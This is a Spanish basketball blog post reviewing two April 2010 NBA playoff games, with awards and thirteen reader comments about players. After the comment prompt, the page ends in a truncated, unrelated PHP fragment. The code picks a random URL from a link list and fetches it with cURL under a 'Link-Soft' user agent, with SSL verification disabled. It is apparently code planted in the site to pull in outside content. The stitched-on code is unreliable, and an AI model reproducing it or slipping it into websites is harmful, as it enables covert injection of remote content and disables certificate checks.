Playoffs 28/04/2010: Hara-Kiri

29 de April de 2010 por TheDeerHunter

No es momento para fallar y los Hawks lo han hecho. Batacazo tremebundo en el Philips Arena de Atlanta que les obliga al todo o nada en Milwaukee. El ímpetu de los Bucks les ha comido la moral. No es normal que entre Joe Johnson, Jamal Crawford, Mike Bibby y Josh Smith no se obtenga ni siquiera un miserable 30% jugándose casi 50 tiros, un lamentable 10% redondo en triples más un completo desconcierto defensivo en el último cuarto y en los momentos decisivos en los que perdieron una suculenta ventaja. Tan sólo Marvin Williams, con su mejor actuación en mucho tiempo, y Al Horford resultaron eficaces.

Los Bucks, en cambio, estuvieron más finos y centrados conforme más delicado estuvo el asunto y eso es signo de grandeza. Ridnour y Jennings estuvieron sensacionales, John Salmons muy participativo y las aportaciones casi milagrosas de Ilyasova y Delfino confirmaron la sorpresa. Un esfuerzo realmente solidario. Muy meritorio. Ahora tendrán una ocasión inmejorable para cerrar el tema a su favor.  Sería “El Bombazo” con mayúsculas de esta primera ronda. Muy pocos apostaban por ello.

Mientras, los Nuggets salvaron su primer match-ball. No pintaba bien la cosa antes del descanso, ante una lesión de Nené que puede ser el final de su temporada. “Bird man” salió y aportó el plus de intensidad como no lo ha llegado a hacer este curso. El equipo se contagió y arrollaron en la segunda parte, con muy buenas actuaciones de todo el grupo. Los Jazz fueron apagándose poco a poco, viendo que no podían frenar el juego colectivo de los pupilos de Dantley. Con una defensa inoperante no era suficiente la inmensa aportación de Deron y Boozer. Particularmente decepcionante fue la actuación de Korver, que lo falló todo. La serie se traslada a Salt Lake City donde los Jazz esperan darles un recibimiento a los Nuggets acorde a la situación.

PREMIOS

MVP: Carmelo Anthony (26-11) lideró a los Nuggets a una victoria que les mantiene vivos. Veremos si por mucho tiempo.

Rookie: Brandon Jennings sigue doctorándose en Playoffs que es cuando hay que poner toda la carne en el asador. 25 puntos, 4 de ellos en tiros libres cruciales para amarrar el resultado.

Sorpresa: No ha sido esta una gran temporada para Marvin Williams. De todas maneras ayer fue uno de los destacados de los Hawks con 22 puntos y un 8 de 10 en tiros de campo.

Decepción: Día para olvidar de Kyle Korver que se fue para casa sin anotar ninguno de sus 6 lanzamientos. Y sin Korver no anota algo, ¿qué le queda?

Esfuerzo en vano: Las 3 mejores actuaciones de ayer no se vieron recompensadas con la victoria. Ni las de Deron Williams (34-10) ni Carlos Boozer (25-16) por parte de Utah, ni la de Al Horford (25-11) por los Hawks.

Y MAÑANA…

Un par de Match-Balls. El de los Spurs en el Alamo por lo que los chicos de Cuban deberán sudar mucho para poder jugar el partido final en su casa. Y el de los Suns en el Rose Garden. Casi apostamos por un séptimo partido en este caso.

Comenta

13 comentarios a esta entrada

  1. Love Denise dice:
    #1

    joer con Lemontus, la verdad es que hay que reconocer que salvo él, dudo que hubiera alguien más que apostase por estos Bucks sin Bogut.. Espero que ganen los Bucks, así los Magic les meteran a los ciervos una buena tunda; los Hawks son bastante irregulares, pero son un grupo muy físico y pueden darle un susto a cualquiera como tengan unos días inspirados.
    Creo que los Mavs ganarán a los Spurs. Quizás yo subestimo a los de Popovich, pero veo a la plantilla de Cuban tan superior mirando hombre por hombre, que me cuesta creer que esta serie vaya 3-2.

      Citar

  2. LEmontus dice:
    #2

    Te diré el gran problema de los Hawks desborda prepotencia….. Como puede Josh Smith pegarse tiros con oposición o tiros medios(malos tiros) o triples? vale que sea una máquina pero un tío que tiene un mal tiro y no mete un tiro libre no puede hacer eso(y menos teniendo a JO JO,Jamal y horford. No se como ´´wood´´ permite que josh se explaye tano en ataque.
    Además de eso la mala gana de Joe Jhonson que no la salieron las cosas y se puso hacer faltas y hcer el tonto. La gran pena es que da la sensación que como aprieten pueden ganar.

    Por el lado de bucks increible , Hacía tiempo que un jugador no me motivaba tanto, pero es que jennings es mucha tela…. Manejo, Defensa.Liderazgo,Tira,Penetra…. Por cierto vaya tapón que le puso a Jamal Crawford intentaré buscarlo que crak jajajajaj

    ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡FEAR THE DEER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Del otro partido no hablo porque me queda por ver la segunda parte.(que malos son los Po para la universidad xD).

      Citar

  3. LEmontus dice:
    #3

    Por cierto ahora en Po ¿hay alguna pareja exterior más productiva en ataque que Jenings -Salmons? yo creo que no así por encima.

      Citar

  4. Txusma dice:
    #4

    A mi me caen más simpaticos los Bucks y con las bajas de Redd y Bogut lo que están haciendo tiene un mérito terrible. Muy grande Jennings q en Playoffs está dando un paso adelante y un aplauso para los que apostaron por él en la franquicia.

      Citar

  5. TheDeerHunter dice:
    #5

    Si no me falla la memoria Josh Smith lanzó únicamente 8 veces a canasta anoche. Eso no es exáctamente explayarse, sobre todo teniendo en cuenta lo que se tiraron Crawford y Joe Johnson, bastante horrendos.

    Con respecto a las plantillas Dallas-Spurs… yo creo que LDenise te dejas llevar por el rendimiento del último año, con muchos problemas físicos y demás. Pero en un estado de forma ideal, hombre por hombre, yo me quedaría con los ojos cerrados con un Parker-Ginobili-Jefferson-Duncan-McDyess antes que con un Kidd-Butler-Marion-Nowitzki-Haywood, siendo los dos plantillas impresionantes nominalmente.

    Parejas exteriores productivas… Durant y Westbrook. Y Allen y Pierce también han estado francamente bien.

      Citar

  6. sergio dice:
    #6

    Supongo que se referirá a parejas de base-escolta, porque si es de exteriores si que hay más. Aparte de las mencionadas, un James-Williams, Nash-Richardson (menudos playoffs se esta marcando Jason), Rondo-Allen/Pierce, Rose-Deng, Billups-Carmelo. Pero que tienes razón LEmontus, para mi son la pareja que mejor lo está haciendo, aparte de clasificaciones eficacia y todo eso. Pero me parece más importante el compromiso defensivo de todo el equipo y la tarea de Skiles de involucrar a todos sus jugadores en la tarea que saben desempeñar mejor sin bajar la intensidad. Para mi el simple hecho de llegar aqui ya tiene un mérito enorme… y me hubiese gustado ver a este equipo con el 2º mejor pívot de la temporada.

    La serie de Utah-Denver es como se esperaba, con un intercambio de golpes constantes. Se la puede llevar cualquiera a pesar de que Utah siga con ventaja en la eliminatoria. Ver a Deron y Boozer es recordar a Stockton y Malone. En otro estilo, pero es de los 5 mejores duos de la liga ahora mismo (o mas si hablamos de pareja interior-exterior)

      Citar

  7. sergio dice:
    #7

    P.D: vaya canastón de Ilyasova y que salvaje es JR Smith

      Citar

  8. telekoman dice:
    #8

    ¿Quizás Nelson – Carter?

      Citar

  9. LEmontus dice:
    #9

    Explayarse es gustarse, hacer cosas que si salen eres muy bueno y si no eres tonto(y más si no son tu especialidad). De los 8 tiros que se pegó uno fue un triple en los ultimos minutos que por supuesto no metió, otro un tiro medio com Mbah poniéndole una mano en la cara, y un tiro medio lejano, las cosas no son así, cada uno a lo suyo y lo de ese hombre no es tirar.
    En puntos los superan rose-deng ,durant- westbrook,billups-anthony y james-william. No está mal y mas tenindo en centa el 4-1 de bulls.

    Quizás sea exagerar pero Affalo(jugadorazo otras de mis debilidades en al nba) y JR son los que hacen que Denver no sea un miami(dentro de lo que cabe) , estos dos le dan mil soluciones al equipo en ataque(ambos) y en defensa(affalo).

    Que gusto da ver jugar a Deron y Boozer , vaya equipo se han montado los jazz .Por cierto como cambia utah cuando está price y deron xD… con okur y AK serían aun mejores pero creo que Utah opta a todo como ya he dicho otras veces el mejor equipo del oeste sin duda alguna.

      Citar

  10. pcerezo dice:
    #10

    Hey, estoy todo el día reunido y no tengo tiempo ni para rascarme las pelotas.
    Ha venido un pez gordo de mi empresa directamente desde Beverly Hills y me comenta que lo flipan con Gasol.
    Lemontus, estarás más excitado que Mourinho ayer en Camp-Mou…
    Un saludo,
    Pablo

      Citar

  11. sergio dice:
    #11

    A Afflalo lo considero especialista defensivo. Quizás si estuviera en un equipo con menos recursos exteriores (Minnessota por ejemplo) podría tomar responsabilidades en ataque. De hecho, creo que para George Karl es más ofensivo Ty Lawson aunque el equipo sufra cuando esta en pista y se enfrenta a jugadores que le sacan 15 cm. De todas formas, a mi es un jugador que también me gusta mucho: sabe su papel, pasa desapercibido, no tiro mál y es comprometido. Típico jugador que hace equipo, pero tampoco le pidas mucho más al chaval LEmontus.. no se va a convertir en un top 30 de la liga…

      Citar

  12. max dice:
    #12

    Marvin Williams, ya que lo citas como sorpresa, es otro de los que podria haber entrado en el post de los fracasos del draft. Numero 2 en el 2005 por delante de D.Williams y de C.Paul, su rendimiento hasta la fecha no ha sido acorde a su posici?n en el draft.

      Citar

  13. LEmontus dice:
    #13

    vaya tela duncan peor que nunca puf…. mañna mirareis los números y os pensareis que ha jugado bien nada de eso todo canastas hechas, no ha metido una posteando y los arbitros le hn regalado una canasta increible es el 2 niño mimdo de los arbitros tras lebron. Tangue arbitral a duncan le permiten demasiada itensidad en denfensa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>